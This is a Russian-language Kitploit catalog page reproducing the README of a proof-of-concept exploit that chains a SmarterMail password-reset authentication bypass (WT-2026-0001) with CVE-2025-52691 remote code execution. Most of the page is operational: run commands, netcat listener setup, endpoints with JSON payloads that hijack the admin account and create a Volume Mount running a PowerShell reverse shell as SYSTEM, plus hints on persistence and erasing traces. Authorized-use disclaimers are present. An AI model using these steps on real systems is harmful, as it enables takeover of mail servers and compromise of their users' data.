Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-52691-PoC-SmarterMail-authentication-bypass-exploit-WT-2026-0001 — CVE-2025-52691 PoC: Основан на статье watchtowr WT-2026-0001 об эксплойте обхода аутентификации; это функциональный скрипт атаки на Python. | Kitploit
Инструменты/GitHubGitHub/ninjazan420/cve-2025-52691-poc-smartermail-authentication-bypass-exploit-wt-2026-0001
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеАутентификацияRed TeamingИнструмент Удаленного Доступа
GitHubninjazan420/cve-2025-52691-poc-smartermail-authentication-bypass-exploit-wt-2026-0001

CVE-2025-52691-PoC-SmarterMail-authentication-bypass-exploit-WT-2026-0001

CVE-2025-52691 PoC: Основан на статье watchtowr WT-2026-0001 об эксплойте обхода аутентификации; это функциональный скрипт атаки на Python.

Репозиторий
77 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-52691 / WT-2026-0001 SmarterMail Exploit

🚨 ВАЖНОЕ УВЕДОМЛЕНИЕ

Этот инструмент предназначен только для авторизованного тестирования безопасности и образовательных целей!

  • Несанкционированное использование незаконно и неэтично
  • Применяйте только к системам с явным разрешением
  • Используйте на свой страх и риск
  • Пользователи несут ответственность за соблюдение всех применимых законов

📋 Обзор

Этот эксплойт объединяет две критические уязвимости в SmarterMail:

  1. CVE-2025-52691: Удалённое выполнение кода до аутентификации через загрузку файла
    • Оценка CVSS: 10.0 (критическая)
    • Затронутые версии: Build 9406 и ранее, Build 16.3.6989.16341 и ранее
    • Исправленные версии: Build 9413 и новее

https://github.com/watchtowrlabs/watchTowr-vs-SmarterMail-CVE-2025-52691

  1. WT-2026-0001: Обход аутентификации через сброс пароля
    • CVE-ID не присвоен
    • Затронутые версии: до Build 9510 включительно
    • Исправленные версии: Build 9511 (15 января 2026 г.)

https://labs.watchtowr.com/attackers-with-decompilers-strike-again-smartertools-smartermail-wt-2026-0001-auth-bypass/

Вектор атаки

Эксплойт выполняет атаку в 3 фазы:

  1. Фаза 1: Обход аутентификации через WT-2026-0001

    • Смена пароля администратора без проверки старого пароля
  2. Фаза 2: Вход администратора с новым паролем

    • Аутентификация в веб-интерфейсе SmarterMail
  3. Фаза 3: Удалённое выполнение кода через функциональность Volume Mounts

    • Создание Volume Mount с командой reverse shell
    • Выполнение OS-команд с привилегиями SYSTEM

Предварительные требования

Системные требования

  • Python 3.6+
  • Netcat (nc)
  • curl
  • Linux/macOS/Windows (WSL)

Инструкции по установке

root@kitploit:~
# Install Python 3 (if not available)
# Ubuntu/Debian
sudo apt update && sudo apt install python3 python3-pip

# macOS
brew install python3

# Windows (WSL)
wsl --install

# Install netcat
# Ubuntu/Debian
sudo apt install netcat

# macOS
brew install netcat

# Windows (WSL)
sudo apt install netcat-traditional

Установка зависимостей

root@kitploit:~
# Python dependencies (if needed)
pip3 install requests

Быстрый старт

Способ 1: Автоматическая настройка (рекомендуется)

root@kitploit:~
# Make executable
chmod +x run_exploit.sh

# Automated setup
./run_exploit.sh --auto

# Or interactive setup
./run_exploit.sh

Способ 2: Прямое выполнение

root@kitploit:~
# Setup listener (in one terminal)
nc -lvnp 4444

# Run exploit (in a second terminal)
python3 exploit.py -H http://192.168.1.100 -P 9998 -A 192.168.1.50 -p 4444

Способ 3: Со всеми опциями

root@kitploit:~
python3 exploit.py \
  -H http://192.168.1.100 \
  -P 9998 \
  -A 192.168.1.50 \
  -p 4444 \
  -d \
  --admin-username admin \
  --new-password "MySecurePassword123!"

Подробные инструкции

Шаг 1: Подготовка

  1. Определение цели

    root@kitploit:~
    # Check target host
    curl -I http://192.168.1.100:9998
    
    # Identify SmarterMail version
    # (Usually in login page or HTTP headers)
    
  2. Настройка слушателя

    root@kitploit:~
    # In Terminal 1: Start listener
    nc -lvnp 4444
    
    # The listener must be running before the exploit is executed
    
  3. Проверка сети

    root@kitploit:~
    # Ensure connection between attacker and target is possible
    ping 192.168.1.100
    nc -zv 192.168.1.100 9998
    

Шаг 2: Выполнение эксплойта

root@kitploit:~
# With the runner script (recommended)
./run_exploit.sh

# Or directly with Python
python3 exploit.py -H http://192.168.1.100 -P 9998 -A 192.168.1.50 -p 4444

Шаг 3: После выполнения эксплойта

  1. Подключение к оболочке

    root@kitploit:~
    # In the listener terminal, a connection should now appear
    # You should have a SYSTEM shell
    
  2. Проверка доступа

    root@kitploit:~
    # In the obtained shell
    whoami
    hostname
    ipconfig /all  # Windows
    ifconfig       # Linux
    
  3. Постоянный доступ

    root@kitploit:~
    # Optional: Set up persistence
    # Windows: Install as service
    # Linux: Cron job or systemd service
    

🔧 Параметры конфигурации

Параметры exploit.py

ПараметрОписаниеЗначение по умолчанию
-H, --hostЦелевой хост (обязательно)-
-P, --portЦелевой порт9998
-A, --attacker-ipIP-адрес атакующего для reverse shell (обязательно)-
-p, --attacker-portПорт атакующего для reverse shell (обязательно)-
-d, --debugВключить режим отладкиFalse
--admin-usernameИмя пользователя администратораadmin
--new-passwordНовый пароль администратораNewPassword123!@#

Параметры run_exploit.sh

ПараметрОписание
-t, --targetЦелевой хост
-p, --portЦелевой порт
-a, --attacker-ipIP-адрес атакующего
-l, --listener-portПорт слушателя
-n, --new-passwordНовый пароль администратора
-u, --admin-userИмя пользователя администратора
-d, --debugРежим отладки
--autoАвтоматический режим

Примеры

Пример 1: Базовое использование

root@kitploit:~
# Terminal 1: Start listener
nc -lvnp 4444

# Terminal 2: Run exploit
python3 exploit.py -H http://192.168.1.100 -P 9998 -A 192.168.1.50 -p 4444

Пример 2: С пользовательскими учётными данными

root@kitploit:~
python3 exploit.py \
  -H https://mail.company.com \
  -P 443 \
  -A 10.0.0.1 \
  -p 8080 \
  --admin-username administrator \
  --new-password "ComplexPassword123!@#"

Пример 3: Режим отладки

root@kitploit:~
python3 exploit.py -H http://192.168.1.100 -P 9998 -A 192.168.1.50 -p 4444 -d

Пример 4: Автоматическая настройка

root@kitploit:~
./run_exploit.sh --auto

Технические подробности

Фаза 1: Обход аутентификации

Endpoint: POST /api/v1/auth/force-reset-password

Payload:

root@kitploit:~
{
  "IsSysAdmin": "true",
  "OldPassword": "dummy",
  "Username": "admin",
  "NewPassword": "NewPassword123!@#",
  "ConfirmPassword": "NewPassword123!@#"
}

Успешный ответ:

root@kitploit:~
{
  "success": true,
  "resultCode": 200,
  "debugInfo": "check1\r\ncheck2\r\ncheck3\r\ncheck4.2\r\ncheck5.2\r\ncheck6.2\r\ncheck7.2\r\ncheck8.2\r\n"
}

Фаза 2: Вход администратора

Endpoint: POST /api/v1/auth/login

Payload:

root@kitploit:~
{
  "username": "admin",
  "password": "NewPassword123!@#"
}

Фаза 3: Удалённое выполнение кода через Volume Mounts

Endpoint: POST /api/v1/settings/volume-mounts

Payload:

root@kitploit:~
{
  "name": "random_volume_name",
  "path": "C:\\Temp\\random_volume_name",
  "command": "powershell reverse shell command",
  "enabled": true,
  "type": "command"
}

Устранение неполадок

Часто встречающиеся проблемы

1. Порт заблокирован

root@kitploit:~
# Error: "Connection refused"
# Solution: Check firewall and open port
sudo ufw allow 9998

2. Слушатель недоступен

root@kitploit:~
# Error: "Connection failed"
# Solution: Check listener setup
nc -lvnp 4444

3. Не удалось выполнить аутентификацию

root@kitploit:~
# Error: "Login failed"
# Solution: Check target version (must be vulnerable)

5. Не удалось выполнить RCE

root@kitploit:~
# Error: "Volume mount creation failed"
# Solution: Check admin privileges, target system

Режим отладки

Включите режим отладки для подробного вывода:

root@kitploit:~
python3 exploit.py -H http://192.168.1.100 -P 9998 -A 192.168.1.50 -p 4444 -d

⚠️ Замечания по безопасности

Правовые аспекты

  • Проводите только авторизованные тесты
  • Получайте письменное разрешение
  • Обеспечьте соблюдение местных законов
  • Не проводите тестирование на производственных системах

Меры предосторожности

  1. Тестовая среда: Всегда тестируйте в контролируемых средах
  2. Проверка цели: Убедитесь, что цель является тестовой системой
  3. Сетевая изоляция: Отделяйте тестовые системы от производственной сети
  4. Документирование: Документируйте все тесты
  5. Очистка: Удаляйте все следы после тестирования

Ответственное использование

  • Не причиняйте ущерб
  • Не похищайте и не изменяйте данные
  • Не отключайте системы
  • Будьте прозрачны перед ответственными лицами

Обновления и сопровождение

Примечания к версиям

  • v1.0: Начальная версия с полной функциональностью
  • Будущие обновления: Улучшения обработки ошибок и стабильности

🙏 Благодарности

  • watchTowr Labs за оригинальное исследование
  • Сообщество исследователей безопасности за поддержку
  • Всем, кто внёс вклад в улучшения

⚠️ Помните: с большой силой приходит большая ответственность!

Скачать инструмент